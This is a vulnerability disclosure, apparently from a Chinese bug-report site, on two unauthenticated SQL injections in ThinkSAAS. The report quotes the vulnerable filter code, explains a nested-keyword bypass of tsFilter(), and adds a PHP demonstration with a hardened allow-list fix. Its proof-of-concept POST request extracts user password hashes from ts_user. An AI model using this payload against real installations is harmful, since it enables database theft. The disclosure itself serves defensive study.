### Brief description:
Two more SQL injections in the latest ThinkSAAS that bypass the newly added filtering
Works regardless of magic_quotes_gpc; no login required
### Details:
This bug was analyzed earlier by ′ 雨。: [WooYun: Thinksaas filter-bypass injection vulnerability](http://www.wooyun.org/bugs/wooyun-2014-050236)
The vendor has since released a new version that adds filtering, but the filtering is not strict and can be bypassed to keep injecting.
Instance 1:
The current code in /app/tag/action/add_ajax.php:
```
case "do":
$objname = t($_POST['objname']);
$idname = tsFilter(t($_POST['idname']));
$objid = t($_POST['objid']);
$tags = t($_POST['tags']);
$new['tag']->addTag($objname,$idname,$objid,$tags);
echo "<script language=JavaScript>parent.window.location.reload();</script>";
break;
```
On top of the original `$idname = t($_POST['idname']);` the filter function tsFilter() was added.
So there are now two layers: t() strips a long list of characters, and tsFilter() strips SQL keywords.
```
function t($text) {
$text = preg_replace ( '/\[.*?\]/is', '', $text );
$text = cleanJs ( $text );
// strip whitespace completely BY QINIAO
$text = preg_replace ( '/\s(?=\s)/', '', $text );
$text = preg_replace ( '/[\n\r\t]/', ' ', $text );
$text = str_replace ( ' ', ' ', $text );
// $text = str_replace ( ' ', '', $text );
$text = str_replace ( ' ', '', $text );
// NOTE: the string literals in the two active str_replace calls above did not
// survive extraction; as printed the first is a no-op and the second would strip
// every ASCII space, which the PoC below (ordinary spaces survive t()) shows the
// real source does not do. They are most likely non-ASCII whitespace or an HTML entity.
$text = str_replace ( '&', '', $text );
$text = str_replace ( '=', '', $text );
$text = str_replace ( '-', '', $text );
$text = str_replace ( '#', '', $text );
$text = str_replace ( '%', '', $text );
$text = str_replace ( '!', '', $text );
$text = str_replace ( '@', '', $text );
$text = str_replace ( '^', '', $text );
$text = str_replace ( '*', '', $text );
$text = str_replace ( 'amp;', '', $text );
$text = str_replace ( 'position', '', $text );
$text = strip_tags ( $text );
$text = htmlspecialchars ( $text );
$text = str_replace ( "'", "", $text );
return $text;
}
```
That is the character filter. tsFilter() is the keyword filter:
```
function tsFilter($value){
$value = trim($value);
// SQL commands and keywords that are not allowed in submitted input
$words = array();
$words[] = "add ";
$words[] = "and ";
$words[] = "count ";
$words[] = "order ";
$words[] = "table ";
$words[] = "by ";
$words[] = "create ";
$words[] = "delete ";
$words[] = "drop ";
$words[] = "from ";
$words[] = "grant ";
$words[] = "insert ";
$words[] = "select ";
$words[] = "truncate ";
$words[] = "update ";
$words[] = "use ";
$words[] = "--";
$words[] = "#";
$words[] = "group_concat";
$words[] = "column_name";
$words[] = "information_schema.columns";
$words[] = "table_schema";
$words[] = "union ";
$words[] = "where ";
$words[] = "alert";
$value = strtolower($value); // convert to lowercase
foreach($words as $word){
if(strstr($value,$word)){
$value = str_replace($word,'',$value);
}
}
return $value;
}
```
That is the keyword filter. Note that it lowercases the input, then does a single str_replace pass per keyword and never re-scans the result.
To get past t() we simply avoid the characters it strips; the payload needs none of them.
To get past tsFilter() we write "select" as "selselect ect": the pass removes the inner "select " (keyword plus trailing space), and the remaining "sel" and "ect" splice back together into "select". The same trick works for "union " and "from ".
Now look at addTag(), which handles adding the tag:
```
function addTag($objname,$idname,$objid,$tags){
......
$tagIndexCount = $this->findCount('tag_'.$objname.'_index',array(
$idname=>$objid,
'tagid'=>$tagid,
));
```
Here $idname is used as the array key and passed into findCount():
```
public function findCount($table, $conditions = null) {
$where = "";
if (is_array ( $conditions )) {
$join = array ();
foreach ( $conditions as $key => $condition ) {
$condition = $this->escape ( $condition );
$join [] = "{$key} = {$condition}";
}
$where = "WHERE " . join ( " AND ", $join );
} else {
if (null != $conditions)
$where = "WHERE " . $conditions;
}
$sql = "SELECT COUNT(*) AS ts_counter FROM " . dbprefix . "{$table} {$where}";
$result = $this->db->once_fetch_assoc ( $sql );
return $result ['ts_counter'];
}
```
Here only the value is escaped; the key is interpolated into the WHERE clause untouched.
Combining the keyword-filter bypass above with this unescaped key gives direct SQL injection.
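The following is an added example written for this edit, not ThinkSAAS code and not the original reporter's. It ports tsFilter() and the key/value loop of findCount() from the snippets above into a stand-alone script, runs the PoC idname value through them so the splice and the unquoted key are visible in the resulting SQL, and contrasts a hardened builder that allow-lists the column name. The allow-list contents, the table name ts_tag_article_index, the use of addslashes() in place of $this->escape(), and the function names ts_filter_port, build_where and build_where_safe are assumptions.

```php
<?php
// Added example for this report (not ThinkSAAS code). Re-implements the keyword
// stripping of tsFilter() and the WHERE-clause building of findCount(), shows the
// "selselect ect" splice surviving the filter and landing unquoted in the SQL, and
// contrasts a hardened builder that allow-lists the column name. ALLOWED_IDNAMES,
// build_where, build_where_safe and ts_filter_port are assumed names, not project APIs.

// Port of tsFilter(): trim, lowercase, then ONE str_replace pass per keyword.
function ts_filter_port(string $value): string
{
    $words = ['add ', 'and ', 'count ', 'order ', 'table ', 'by ', 'create ',
              'delete ', 'drop ', 'from ', 'grant ', 'insert ', 'select ',
              'truncate ', 'update ', 'use ', '--', '#', 'group_concat',
              'column_name', 'information_schema.columns', 'table_schema',
              'union ', 'where ', 'alert'];
    $value = strtolower(trim($value));
    foreach ($words as $word) {
        // removing "select " from "seleselect ct" leaves "select": the halves
        // splice together and nothing re-scans the result for the keyword
        $value = str_replace($word, '', $value);
    }
    return $value;
}

// Mirror of findCount(): values are escaped, keys are interpolated raw.
// addslashes() stands in for $this->escape(), which is not shown on the page.
function build_where(array $conditions): string
{
    $join = [];
    foreach ($conditions as $key => $condition) {
        $join[] = "{$key} = '" . addslashes((string) $condition) . "'";
    }
    return 'WHERE ' . join(' AND ', $join);
}

// Hardened builder: a column name is an identifier chosen by the application,
// not free text, so refuse anything outside a fixed allow-list and quote it.
const ALLOWED_IDNAMES = ['articleid', 'photoid', 'groupid', 'tagid']; // assumed list

function build_where_safe(array $conditions): string
{
    $join = [];
    foreach ($conditions as $key => $condition) {
        if (!in_array($key, ALLOWED_IDNAMES, true)) {
            throw new InvalidArgumentException("illegal column name: {$key}");
        }
        $join[] = "`{$key}` = '" . addslashes((string) $condition) . "'";
    }
    return 'WHERE ' . join(' AND ', $join);
}

// The idname value from the PoC request below, exactly as POSTed.
$idname = '111 uniunion on seleselect ct pwd frfrom om ts_user limit 1,1;a';
$filtered = ts_filter_port($idname);
echo "after tsFilter: {$filtered}\n";

// What findCount() ends up sending to MySQL (table name assumed from objname=article).
echo 'SELECT COUNT(*) AS ts_counter FROM ts_tag_article_index ',
     build_where([$filtered => '111111', 'tagid' => 5]), "\n";

// The hardened builder rejects the same key and accepts a legitimate one.
try {
    build_where_safe([$filtered => '111111', 'tagid' => 5]);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
echo build_where_safe(['articleid' => '111111', 'tagid' => 5]), "\n";
```

Run with `php example.php`. The filtered value comes out as `111 union select pwd from ts_user limit 1,1;a`, because each keyword is removed in one pass and the surrounding fragments close up into the keyword again; the point of the hardened builder is that no amount of keyword stripping fixes this, since a column name that comes from the request must be compared against a fixed list, not cleaned.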
Instance 2 is in add.php:
```
case "do":
$objname = tsFilter($_POST['objname']);
$idname = tsFilter($_POST['idname']);
$objid = intval($_POST['objid']);
$tags = t($_POST['tags']);
$new['tag']->addTag($objname,$idname,$objid,$tags);
tsNotice('标签添加成功!');
break;
```
This is the same addTag() call, but here there is no t(), only tsFilter(), so injection is even easier (objid is cast with intval, so objname and idname are the usable inputs).
The rest of the process is the same as instance 1.
### Proof of concept:
Send the request:
URL: http://localhost/thinksaas/index.php?app=tag&ac=add_ajax&ts=do
POST: objid=111111&objname=article&idname=111 uniunion on seleselect ct pwd frfrom om ts_user limit 1,1;a&tags=idname
![11.png](https://images.seebug.org/upload/201403/1118420066bcfde98a0e28333a78ca047c121624.png)
![22.png](https://images.seebug.org/upload/201403/111842080eef7c6d787561d3f093ecc884380315.png)